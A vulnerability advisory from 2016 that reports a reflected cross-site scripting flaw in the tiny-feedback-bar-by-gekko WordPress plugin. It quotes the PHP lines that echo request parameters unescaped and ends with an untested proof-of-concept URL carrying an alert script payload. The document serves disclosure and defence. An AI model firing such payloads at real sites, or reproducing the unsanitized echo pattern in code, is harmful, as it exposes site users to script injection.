Advisory #: 498
Title: Reflected XSS in wordpress plugin tiny-feedback-bar-by-gekko v0.3.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/tiny-feedback-bar-by-gekko
Downloads: 845
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: tiny-feedback-bar-by-gekko
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./tiny-feedback-bar-by-gekko/includes/functions/ajax.php: 619: <td colspan="3"><div class="succes"><? echo $_GET['msg']; ?></div></td> 651: <input name="page_id" type="hidden" value="<?php echo $_GET['page_id']; ?>" /> 674: <td colspan="3"><div class="succes"><? echo $_GET['msg']; ?></div></td> 730: <input name="page_id" type="hidden" value="<?php echo $_GET['page_id']; ?>" /> 758: <td colspan="3"><div class="succes"><? echo $_GET['msg']; ?></div></td> 787: <input name="page_id" type="hidden" value="<?php echo $_GET['page_id']; ?>" /> 810: <td colspan="3"><div class="succes"><? echo $_GET['msg']; ?></div></td> 839: <input name="page_id" type="hidden" value="<?php if (isset($_GET['page_id'])) { echo $_GET['page_id']; } ?>" /> The variable msg appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./tiny-feedback-bar-by-gekko/includes/functions/ajax.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/tiny-feedback-bar-by-gekko/includes/functions/ajax.php?msg="><script>alert(1);</script><"